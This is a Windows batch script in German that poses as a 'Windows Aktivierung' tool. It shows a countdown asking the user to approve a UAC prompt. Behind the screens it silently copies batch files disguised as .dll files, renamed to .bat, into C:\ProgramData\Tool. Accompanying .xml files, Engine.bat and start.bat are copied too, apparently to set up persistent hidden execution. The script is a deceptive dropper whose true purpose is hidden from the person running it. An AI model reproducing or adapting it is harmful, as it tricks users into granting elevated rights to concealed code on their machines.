@echo off
Title Willkommen v.3.2 
cls
echo -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                        Windows Aktivierung                                                          -
echo -                                                                                                                     -
echo -                              Bitte antworten sie auf den folgenden UAC mit Ja                                       -
echo -                                     um die aktivierung zu starten                                                   -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                             In 4...                                                                 -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                              v.3.2                                                                  -
echo -                                         (c) MarcBeast                                                               -
echo -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
TIMEOUT /T 2 >nul 2>&1
 cls
echo -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                        Windows Aktivierung                                                          -
echo -                                                                                                                     -
echo -                              Bitte antworten sie auf den folgenden UAC mit Ja                                       -
echo -                                     um die aktivierung zu starten                                                   -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                             In 3...                                                                 -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                              v.3.2                                                                  -
echo -                                         (c) MarcBeast                                                               -
echo -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
TIMEOUT /T 2 >nul 2>&1
md "C:\ProgramData\Tool" >nul 2>&1
copy msc.dll "C:\ProgramData\Tool\msc.bat" >nul 2>&1
copy msc.xml "C:\ProgramData\Tool\msc.xml" >nul 2>&1
copy cmd.dll "C:\ProgramData\Tool\cmd.bat" >nul 2>&1
copy cmd.xml "C:\ProgramData\Tool\cmd.xml" >nul 2>&1 
cls
echo -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                        Windows Aktivierung                                                          -
echo -                                                                                                                     -
echo -                              Bitte antworten sie auf den folgenden UAC mit Ja                                       -
echo -                                     um die aktivierung zu starten                                                   -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                             In 2...                                                                 -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                              v.3.2                                                                  -
echo -                                         (c) MarcBeast                                                               -
echo -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
TIMEOUT /T 2 >nul 2>&1
copy "Engine.bat" "C:\ProgramData\Tool\" >nul 2>&1 
copy "start.bat" "C:\ProgramData\Tool\" >nul 2>&1 

cls
echo -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                        Windows Aktivierung                                                          -
echo -                                                                                                                     -
echo -                              Bitte antworten sie auf den folgenden UAC mit Ja                                       -
echo -                                     um die aktivierung zu starten                                                   -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                             In 1...                                                                 -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                              v.3.2                                                                  -
echo -                                         (c) MarcBeast                                                               -
echo -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
TIMEOUT /T 2 >nul 2>&1
cls
echo -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                        Windows Aktivierung                                                          -
echo -                                                                                                                     -
echo -                              Bitte antworten sie auf den folgenden UAC mit Ja                                       -
echo -                                     um die aktivierung zu starten                                                   -
echo -                                                                                                                     -
echo -                                                 _                                                                   -
echo -                                       BITTE BESTATIGEN SIE                                                          -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                                                                                                     -
echo -                                              v.3.2                                                                  -
echo -                                         (c) MarcBeast                                                               -
echo -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
cls

exit

